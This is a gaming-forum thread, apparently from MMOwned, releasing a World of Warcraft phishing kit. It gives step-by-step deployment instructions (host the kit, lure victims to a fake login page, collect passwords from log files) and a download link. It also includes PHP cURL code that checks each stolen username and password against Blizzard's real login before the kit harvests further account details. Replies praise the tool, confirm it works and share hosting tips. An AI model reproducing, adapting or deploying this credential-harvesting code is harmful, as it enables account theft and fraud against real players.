[Release] WoW Phisher w/ WORKING LOGIN CHECK

[mjmorrell3]

Hello MMowned, I had a request from someone to edit a WoW Phisher so that it actually checks for valid account information before writing it to a file and proceeding to collect more bullshit information.

The script uses cURL and libCURL and requires that your PHP installation has both of these.

NOTE: I did NOT code the original phisher. Also, after entering correct account info, it takes you to the second page which proceeds to ask you for the full account info.

Steps:
1. Find free webhosting with PHP and cURL
2. Upload all files in the zip file to a directory.
3. Send people to your fake login.
4. Check log1.html and log2.html for the usernames and passwords they enter.

Download:
http://www.mediafire.com/?mdjjmz0mdix

Enjoy!

Also, if any of you guys gets an extra account, feel free to PM it to me

EDIT: For all your PHP coders, heres the code to incoporate this into your phisher if you know what you are doing.

$ch2 = curl_init();
$useragent="Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3";
curl_setopt ($ch2, CURLOPT_URL, "https://www.blizzard.com/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Fcharcopy%2F&loginType= wow");
curl_setopt($ch2, CURLOPT_USERAGENT, $useragent);
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_POST, 1);
curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch2, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch2, CURLOPT_REFERER, "https://www.blizzard.com/login/login.xml?referer=https%3A%2F%2Fwww.worldofwarcraft.com%2Fcharcopy%2F&loginType= wow");
curl_setopt($ch2, CURLOPT_POSTFIELDS, "accountName=" . $user . "&password=" . $pass);
$source2 = curl_exec($ch2);
curl_close($ch2);
if (strpos($source2, 'Account Login') !== false) {

//Account Login Failed
//Code Here!

} else {

//Account Login Success!
//Code Here!

}

[Nikentic]

virus search? ^^

[mjmorrell3]

Virustotal. MD5: 2185bdb3a1206b45d318be01e730cec1

[Arkeon]

Is this a virus?

[mjmorrell3]

No. It is not a virus..

[tatortotts]

He just gave a virus check -.-
Anyways, +Rep
I don't know how to use this, but good job, man.

-Tator

[m3k0]

Nice <3 +rep

[mjmorrell3]

I will post an updated version with the new phisher page when I can get it done!

[Shawrty]

Nice Thats pretty sweet

[Trauts]

Awesome. You know, I was just thinking about whether it would be possible to do something like this after waking up and checking the logs to see 2 mbs of racial slurs.

[Functions]

This is epic!

[Functions]

Works very well, If you type in a non working account it wont go through for all u just skimming through the page. If its only real it works.

[poofterpantslol]

+rep. now just hoping someone can find a good host for this

[Functions]

110mb Works

[ondskab10O]

i cant download it anymore?can u help me plz?